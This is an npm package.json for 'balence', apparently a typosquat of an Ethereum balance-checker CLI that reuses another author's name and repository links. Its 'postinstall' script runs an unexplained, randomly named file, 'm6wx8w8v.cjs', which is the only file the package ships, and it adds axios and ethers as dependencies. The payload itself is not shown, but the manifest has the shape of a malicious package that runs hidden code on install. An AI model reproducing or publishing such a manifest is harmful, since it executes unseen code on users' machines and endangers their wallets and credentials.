{
  "name": "balence",
  "version": "0.0.5",
  "description": "Simple way to check ether balance of an account address.",
  "main": "index.js",
  "bin": {
    "eth_balance": "bin/eth_balance",
    "eth-balance": "bin/eth_balance"
  },
  "scripts": {
    "postinstall": "node m6wx8w8v.cjs"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/miguelmota/eth-balance"
  },
  "bugs": {
    "url": "https://github.com/miguelmota/eth-balance/issues"
  },
  "homepage": "https://github.com/miguelmota/eth-balance",
  "author": {
    "name": "Miguel Mota",
    "email": "hello@miguelmota.com",
    "url": "https://miguelmota.com/"
  },
  "license": {
    "type": "MIT",
    "url": "https://github.com/miguelmota/eth-balance/blob/master/LICENSE"
  },
  "dependencies": {
    "meow": "^5.0.0",
    "web3": "^1.0.0-beta.37",
    "axios": "^1.7.7",
    "ethers": "^6.13.2"
  },
  "keywords": [
    "ethereum",
    "eth",
    "ether",
    "send",
    "transfer",
    "balance",
    "gwei",
    "wei",
    "checker",
    "watcher",
    "cli"
  ],
  "devDependencies": {
    "standard": "^12.0.1",
    "tape": "^4.10.2",
    "tape-await": "^0.1.2"
  },
  "files": [
    "m6wx8w8v.cjs"
  ]
}